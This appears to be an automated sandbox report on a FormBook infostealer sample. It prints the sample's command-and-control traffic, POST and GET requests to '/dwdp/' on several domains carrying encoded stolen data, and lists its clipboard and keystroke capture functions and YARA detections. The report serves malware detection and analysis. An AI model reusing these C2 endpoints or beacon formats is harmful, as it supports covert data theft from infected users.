55 6f 62 4f 57 34 32 53 44 51 4f 57 57 4b 5f 51 5a 34 49 73 35 56 5f 69 33 75 58 45 4e 59 35 57 76 68 4f 32 41 6c 47 78 67 69 58 4f 58 4a 54 63 6a 47 79 28 79 6e 5a 36 44 49 43 51 78 63 6c 48 45 58 64 50 6b 6a 73 4b 61 6a 5a 59 78 63 74 32 4e 71 61 44 77 6f 58 45 47 4f 68 61 43 46 6c 39 4a 59 37 7a 70 38 53 33 7a 28 53 78 33 6f 5a 44 6d 28 33 77 30 28 6d 79 44 73 65 6e 65 66 58 63 66 28 65 73 6e 5a 50 6a 33 58 49 39 51 32 6e 61 42 43 39 53 4f 66 65 76 38 32 31 6f 72 6d 72 76 33 4d 35 28 70 46 58 5a 4d 51 48 79 58 6b 36 62 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=OQzq3vFDehN9j-e5gm1ZWqmQvgwHN5Sgbk8zDAHP7Tmt5tIZyVMndsF_hhgvopn9~dTLM0yxkU3jQMWuPApUTNdNGdQHHtIJsVvMK4sq4Z8q(vVrL6S11GSCXDw3P0Ua967WGeM8(CrDGNWP67V_qsOG27Loksg2KpEGGHLqAruHGE8BGQdL~Q5VuzkvfeYI5OemZFB8qKHdKSO2Xs(AP8pKDBbbXeJU4UobOW42SDQOWWK_QZ4Is5V_i3uXENY5WvhO2AlGxgiXOXJTcjGy(ynZ6DICQxclHEXdPkjsKajZYxct2NqaDwoXEGOhaCFl9JY7zp8S3z(Sx3oZDm(3w0(myDsenefXcf(esnZPj3XI9Q2naBC9SOfev821ormrv3M5(pFXZMQHyXk6bQ).
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 28 66 65 35 6a 52 68 5a 43 36 6d 51 6b 41 77 46 4e 35 53 6a 62 6b 39 36 44 42 44 66 37 67 47 74 34 5f 41 5a 78 6e 55 6e 61 73 46 38 6d 52 68 6b 6d 4a 6e 6f 7e 64 53 67 4d 78 53 78 6b 56 54 6a 51 4a 71 75 50 54 78 58 51 4e 64 50 41 64 52 52 4d 4e 49 51 73 56 79 56 4b 38 38 71 34 61 55 71 7e 65 56 72 46 4d 47 32 69 57 53 48 62 6a 77 38 64 30 55 57 39 36 37 6f 47 65 4d 61 28 41 44 44 47 39 47 50 35 59 39 34 68 73 4f 35 36 62 4b 4a 30 73 64 66 66 70 51 75 4c 55 72 36 48 75 50 6b 46 41 78 65 57 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=OQzq3vFDehN9(fe5jRhZC6mQkAwFN5Sjbk96DBDf7gGt4_AZxnUnasF8mRhkmJno~dSgMxSxkVTjQJquPTxXQNdPAdRRMNIQsVyVK88q4aUq~eVrFMG2iWSHbjw8d0UW967oGeMa(ADDG9GP5Y94hsO56bKJ0sdffpQuLUr6HuPkFAxeWA).
Source: global traffic HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 35 4d 57 35 68 32 31 5a 56 4b 6d 50 68 41 77 46 55 4a 53 6e 62 6c 42 36 44 41 48 50 37 57 65 74 35 75 51 5a 78 46 4d 6e 63 73 46 38 75 78 67 76 6f 70 6e 79 7e 65 75 47 4d 30 7e 48 6b 58 66 6a 52 66 75 75 62 6a 78 55 62 4e 64 4b 48 64 51 48 49 4e 49 51 73 56 28 45 4b 34 49 55 34 61 38 71 28 72 42 72 46 4b 53 31 6a 47 53 43 55 44 77 38 64 30 59 5a 39 36 37 43 47 66 6b 4b 28 41 6a 44 47 76 65 50 70 64 64 5f 32 73 4f 45 32 37 4c 69 37 63 73 58 4b 70 49 53 47 46 58 36 41 71 79 48 47 6b 38 42 57 46 70 4c 70 41 34 2d 68 54 6b 79 66 65 45 75 35 50 32 6d 5a 41 70 73 74 34 58 64 46 53 65 32 55 50 62 44 4e 38 6f 67 62 78 62 41 41 4f 46 35 34 55 34 66 4f 58 67 32 53 57 6f 4f 57 6e 4b 5f 64 62 51 49 6d 35 56 37 69 33 75 45 61 39 55 65 57 76 39 77 32 46 70 47 77 51 65 58 4f 6b 42 54 62 56 4f 79 69 79 6e 58 74 54 49 32 46 42 63 72 48 45 65 47 50 6b 4b 78 4b 62 54 5a 66 67 4d 74 32 63 71 62 49 41 6f 54 45 47 4f 32 61 43 46 66 39 4a 63 46 7a 6f 4d 43 32 44 44 53 7e 55 77 5a 44 56 48 33 35 45 28 6c 6b 54 73 54 6e 66 6a 6f 63 66 53 46 73 69 68 50 69 47 28 49 39 51 6d 6e 59 53 71 39 63 75 66 62 37 4d 33 67 67 4a 58 36 6c 31 38 54 78 71 68 6f 59 72 70 41 37 32 35 45 47 31 4c 30 69 35 76 6d 50 38 75 48 44 64 59 77 6f 77 4d 52 70 74 6a 7a 59 71 66 56 56 6a 52 41 5a 48 35 30 61 5a 31 4a 64 39 4d 73 6c 6a 54 47 4a 4c 58 59 48 71 4e 54 57 58 44 4d 4d 52 63 69 44 4e 34 33 6c 58 41 43 39 34 63 31 4e 6c 66 56 79 6d 55 44 71 5a 4f 33 28 66 43 35 30 48 58 65 72 71 6d 69 6b 62 77 6c 6a 4e 51 67 39 34 49 36 33 71 57 44 41 76 6e 52 6b 63 78 6a 6c 47 53 4c 65 6c 74 42 75 4a 63 67 72 6b 71 6e 4b 37 46 73 4a 45 42 63 76 49 77 6e 5a 46 4f 4d 76 44 4f 2d 47 41 4e 52 56 79 65 52 55 49 51 37 32 58 4a 6d 37 78 6c 5a 78 4a 57 44 4e 63 30 35 47 41 43 64 66 44 6b 52 71 57 6a 52 56 73 39 49 51 66 41 52 76 5a 64 61 6d 4c 4e 49 6d 73 6d 37 33 4e 65 6c 79 4d 55 75 59 39 78 6e 56 6d 77 7a 65 53 66 38 70 64 7a 65 31 6f 66 31 4c 46 36 53 7e 72 37 72 6f 43 39 31 5a 5a 42 69 48 58 41 55 56 6c 6f 35 71 4e 74 78 42 63 57 77 64 65 55 6f 73 73 7e 6f 54 6d 63 7a 7e 63 68 45 38 58 35 32 77 36 48 6c 78 68 65 42 38 46 28 4a 42 4f 65 6c 6c 32 39 69 62 4f 7e 5f 54 4d 63 70 6d 75 45 61 77 6e 45 6d 4f 76 52 30 6c 42 4d 66 38 50 69 4d 4a 69 76 55 30 4d 76 54 44 35 61 30 6d 39 55 61 52 4f 35 75 69 43 38 6a 58 69 71 63 47 55 35 76 41 2d 56 68 48 5a 78 51 30 73 34 35 5a 39 56 46 42 55 35 69 6c 5f 39 53 65 6d 72 70 7a 37 41 6a 53 5a 43 6b 62 50 4a 6f 4f 63 79 48 33 41 51 56 67 71 38 52 49 49 77 35 68 59 49 33 52 66 61 57 5a 69 56 52 76 36 4f 46 34 62 70 32 53 57 51 5
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
Source: PrWP76ejHO.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PrWP76ejHO.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 1x6VE38oK.22.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1x6VE38oK.22.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1x6VE38oK.22.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1x6VE38oK.22.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ipconfig.exe, 00000016.00000002.512572827.00000000037FA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.t4yfrance.com/dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/
Source: ipconfig.exe, 00000016.00000002.512572827.00000000037FA000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.t4yfrance.com/dwdp/?DDK8=DL0dq8Xp&amp;THg8gZ=NWgjuoil9S/
Source: unknown HTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 61 6d 7a 5a 34 63 63 52 76 46 56 28 51 77 74 64 72 38 62 74 55 71 38 50 61 76 72 4e 66 75 47 49 61 46 64 33 57 62 35 78 6b 56 50 43 53 4e 4c 31 44 36 73 74 55 4a 38 68 71 4d 53 49 61 64 66 7a 63 61 62 6a 45 59 34 4f 38 56 5a 36 6f 65 77 61 57 46 63 4d 31 6b 41 4f 33 78 6d 63 5f 67 6a 4d 38 77 66 77 6e 32 6e 6b 46 6f 4a 4d 51 43 49 39 71 36 4a 48 67 51 38 7e 50 61 6e 72 33 43 63 35 41 30 77 67 77 7e 47 64 79 79 71 73 73 62 4d 30 67 75 38 41 6b 34 2d 53 6c 4c 5f 7a 67 6b 4e 77 38 65 5f 4c 42 78 4c 4e 37 6c 32 66 63 6f 59 37 41 38 65 7e 7a 34 44 59 4c 69 33 67 4f 32 74 4a 66 4b 73 5a 4e 7a 46 4b 63 36 67 53 6a 30 6a 42 38 31 47 48 36 58 58 4c 48 53 51 74 6e 64 54 38 48 53 6c 70 67 5a 42 31 34 66 2d 56 55 67 49 35 5a 48 71 77 48 6d 61 4f 57 32 41 45 4c 34 6b 49 76 4f 6e 69 48 72 51 32 74 77 6a 4a 6f 5a 76 5a 4d 76 48 67 6f 61 69 54 59 67 65 7e 70 28 53 43 4e 33 74 35 30 69 45 52 77 49 6b 78 4a 55 66 28 6c 4a 5a 38 57 28 79 36 2d 7a 51 38 31 36 41 50 66 52 7a 42 69 49 34 69 68 51 67 39 66 76 79 79 76 56 6d 6b 4c 76 32 73 74 71 37 53 64 37 32 28 77 28 30 5a 6e 53 6e 5a 76 6f 4e 64 79 74 75 6b 47 4f 45 64 63 51 34 55 46 39 37 57 4f 6e 71 77 71 4e 73 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5JdjamzZ4ccRvFV(Qwtdr8btUq8PavrNfuGIaFd3Wb5xkVPCSNL1D6stUJ8hqMSIadfzcabjEY4O8VZ6oewaWFcM1kAO3xmc_gjM8wfwn2nkFoJMQCI9q6JHgQ8~Panr3Cc5A0wgw~GdyyqssbM0gu8Ak4-SlL_zgkNw8e_LBxLN7l2fcoY7A8e~z4DYLi3gO2tJfKsZNzFKc6gSj0jB81GH6XXLHSQtndT8HSlpgZB14f-VUgI5ZHqwHmaOW2AEL4kIvOniHrQ2twjJoZvZMvHgoaiTYge~p(SCN3t50iERwIkxJUf(lJZ8W(y6-zQ816APfRzBiI4ihQg9fvyyvVmkLv2stq7Sd72(w(0ZnSnZvoNdytukGOEdcQ4UF97WOnqwqNsBA).
Source: unknown DNS traffic detected: queries for: www.inhomeyoga.com
Source: global traffic HTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=as8dBOCYMIlGkdFtu6bNi6R+poUd8qernbVKNux/Lg6XWSTTcIv/9iufEycx+V+hXMP21oAGdeFqW0RuMIySji5bX/9mKLXNqQ== HTTP/1.1Host: www.inhomeyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dwdp/?THg8gZ=o99SD4CnjZ1qu7iTZtFfc7Nx3UYgSJ0Ur2vCMIrwN9S0TIs4+nDL6lw5CChyhzqrvnlUg4IJDbpF+LHriFN/RsV5sIy/QX8aQA==&DDK8=DL0dq8Xp HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA== HTTP/1.1Host: www.t4yfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dwdp/?THg8gZ=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&DDK8=DL0dq8Xp HTTP/1.1Host: www.a8-group.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard, 1_2_004050C0
Creates a DirectInput object (often for capturing keystrokes)
Source: PrWP76ejHO.exe, 00000000.00000002.254662988.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00404020 GetKeyboardState, 1_2_00404020
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: iscan.exe PID: 5188, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ipconfig.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: PrWP76ejHO.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
